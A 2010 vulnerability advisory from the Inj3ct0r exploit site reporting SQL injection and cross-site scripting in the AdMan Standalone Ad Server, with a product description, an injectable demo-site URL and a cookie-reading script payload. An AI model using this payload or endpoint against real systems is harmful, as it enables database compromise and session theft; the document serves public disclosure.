AdMan Standalone Ad Server suffers from cross site scripting and remote SQL injection vulnerabilities.
f6d977a48da6c741bc8d55fe4ef169b3fec432b3c2da80c532ab5e056d5254eb
===========================================================
AdMan Standalone Ad Server SQLi AND XSS Vulnerability
===========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm Sid3^effects member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name : AdMan Standalone Ad Server SQLi AND XSS Vulnerability
Date : june, 18 2010
Vendor url :http://www.formfields.com/adManArea/adManDemo.php
Critical Level : HIGH
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_
greetz to :All ICW members and my friends :) luv y0 guyz
#######################################################################################################
DESCRIPTION:
AdMan is a standalone Ad Server that provides publishers with a way to organize ads, view real-time traffic statistics, handle online transactions and interact with advertisers. AdMan is the perfect tool for companies wishing to eliminate commission charges from advertising middlemen and provide more customizable ad products to their advertisers. AdMan is compatible with many other ad management services like Google AdSense, AdBrite, and Commission Junction. This way you can centralize your ad reporting and even provide more customizable ad products to premiere advertisers. Moreover, AdMan utilizes iframes and can therefore be plugged into any existing website architecture. Features: Manage your ads, sell your ads, manage advertisers, provide real time reporting, integrate with 3rd party suppliers, accept credit card payments and much more!
#######################################################################################################
Xploit: SQLI Vulnerability
DEMO URL : http://www.formfields.com/adManArea/adMan1/adMan/advertiser/listActiveAdSpacesForCampaign.php?campaignId=[SQLI]
###############################################################################################################
Xploit: XSS Vulnerability
Attack Pattern: "><script>alert(document.cookie)</script>
DEMO URL :http://www.formfields.com/adManArea/adMan1/adMan/advertiser/listActiveAdSpacesForCampaign.php?campaignId=[XSS]
###############################################################################################################
# 0day no more
# Sid3^effects